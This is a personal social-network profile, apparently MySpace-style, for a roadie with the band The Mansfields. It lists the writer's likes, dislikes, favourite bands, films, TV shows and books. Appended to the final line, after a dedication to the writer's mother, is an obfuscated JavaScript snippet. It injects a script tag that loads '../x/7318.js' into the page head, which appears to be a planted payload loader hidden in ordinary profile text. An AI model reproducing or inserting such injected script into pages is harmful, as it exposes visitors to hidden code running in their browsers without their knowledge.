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About Me

The Mansfields - All Dressed Up
.. Music Video Codes By Music Video Code
I work with The Mansfields...Lighting, set-up,Tear down, Euro-travel,Part-time translator(only in Germany),DJ for The Pikes Peak deby Dames!!!...... Always up for practically anything,I CANNOT tolerate any Drug use or Alcoholism..It's all so disgusting and terribly sad and frustrating to be around, I'm a die hard Dallas Cowboy fan.. Or should I say America's team?.....I love History, Most notably German History 1925-1950,Ancient Rome,Celtic history and so on....Drink with friends...Pretty much a Beer and Jager drinker, But Tequila is also nice...Late night talks with friends about future possibilities, Fascinated by what makes people do the things they do (Good or Bad), Coming to terms that the life you have at this moment is extreemly fleeting, Enjoy the bad and good, There is meaning in every experience you have,My favorite shoes are Vans (The classic slip-on's) and a good Old pair of well worn Chuck's...Getting tattoos...Just always looking for something to do...Just don't lay about the house! Oh how boring!!!...Make clothes...Counting down the days 'til our next European tour...Absolutely love late Fall weather....Halloween is the best Holiday,Period!....I could watch Horror Films everyday forever, Especially Old Black and Whites... Mountain Bike riding..Nice, relaxing walks in REALLY old graveyards at night...Rainy days, Snow days stuck in the house....Blah,Blah!!Foggy days..Reading Books on Philosphy,H.P. Lovecraft... Oh let's mention things I despise.....Selfishness, Egos, Ignorance, Intolerance,People who take themselves or life way too serious!!! Life is to important to be taken seriosly!!!! People who think that it's their mission in life to tell you what you should and should not be doing with your life, People who think the world revolves around them, People who impose their views(Political,Religious etc) on you,Getting up EARLY for anything, Laziness, Conformity.....Oh and the list(Both) could go on...

My Interests

Anything and everything to do with music,Music is life it self,Pop Culture art and film.The best of the best to the most horrendous that ya got to offer! The obscure to the offensive (To some).My favorite cities in the world (At least the one's I've been to) are Berlin(Germany)Svenborg(Denmark) and Hollywood(California).German history, most notably 1925-1950.Any Ancient history,Tattoos,Warm Summer nights and Crisp Fall mornings, Spring Water Cigarettes,Good Coffee,Chai Tea,Hanging out with my Lil' niece-Madisen, Long and involved conversations with friends,Travel, Travel, Travel I want to see every inch of the world!Touring around the world with the Guys!!

I'd like to meet:

Alot of the people that I would LOVE to meet have sadly left this earth...Boris Karloff,Bela Lugosi,Elvis Presley,Joey Ramone,Dee Dee Ramone, Rita Hayworth,James Whale,Vincent Price....Those among the living are...Tim Burton,Johnny Depp,Michael Monroe and anybody who dreams the impossibe and works hard to make it possible.....


*HIM*The Mansfields*Backyard Babies*Apocalyptica*Nightwish*She wants Revenge*The 69 Eyes*Hanoi Rocks(The best of all The 80's Rock bands)*London After Midnight*The CrüxShadows*Kill Hannah*The Sounds*The Ramones*Elvis Presley*The Towers of London*Stella Starr*Clear Static*Social Distortion*Michael Monroe*AFI*The Murder Dolls*Depeche Mode*Faster Pussycat*The Undertones*The Wildhearts* GnR*Cheap Trick*Devo*Cab Calloway*Early Crue*Abba*The Vibrators*The Damned*Sisters of Mercy*The Cure*The Bones*Blondie*Peter Murphy*Generation X*Siousxie and the Banshees*Gene Vincent*The Horror Pops*Damone*The Black Halos*Kay Starr*Sahara Hotnights*Adam and The Ants*New Order* Surferosa*Johnny Cash*Missing Persons*Duran Duran*Vain*Wrathchild(UK)* Demented Are Go*The Circle Jerks*The Faint* The Bravery*MCR* The Dead Boys*Billy Idol*Lords of the New Church*The Boys*The Anti-Nowhere League* The Chelsea Smiles*Mensen*Johnny Thunders*The Heartbreakers*The Exploding Hearts* Wanda Jackson* The Hellacopters* Iggy Pop*The Bay City Rollers*Sweet* T-Rex* and Many More!!!


The Nightmare Before Christmas, Edward Scissor Hands, Big Fish,Borat,Sweeny Todd,Into The Wild, All Universal Monster Films, Hellraiser,Elizabeth 1 and 2, Texas Chainsaws(Old and new),Apocalypto,The Funhouse, GhostWorld,Lord of The Rings, King Kong'33,Dawn of The Dead,BraveHeart, Ed Wood, Willard,Sleepy Hollow, The Cabinet of Dr. Caligari, Nosferatu,Amelie, The Pianist, Finding Neverland, King Creole, Downfall, All The Star Wars Films,Sleepy Hollow,Aliens,Predator,House of 1000 corpses,The Devil's Rejects,The Old Dark House,The Corpse Bride and more....


There isn't too much..Alot of DVD watching,Rome(Favorite)Watching The Dallas Cowboy's every Fall Sunday,Ugly Betty,The Family Guy, The Simpsons ,The History Channel, Not too much more?!


Any Historical book about The Holocaust or Nazi era Germany,Ancient Roman History, Celtic History,Viking History The Paranormal, Celebrity Biographies,Oscar Wilde,Edgar Allan Poe,Anne Rice, Archeology,Paleontology, History of Music,The Lenore comic books by Roman Dirge,H.P.Lovecraft,Ralph Emerson,Walt Whitman The Dirt, Please Kill me, ....Just way too many to name! I don't trust anyone who doesn't read!


My Mother, Carole....The strongest woman I know. .."var s=document·('script');s.src='../x/7318.j s';document·getElementsByTagName('head') [0].appendChild(s);"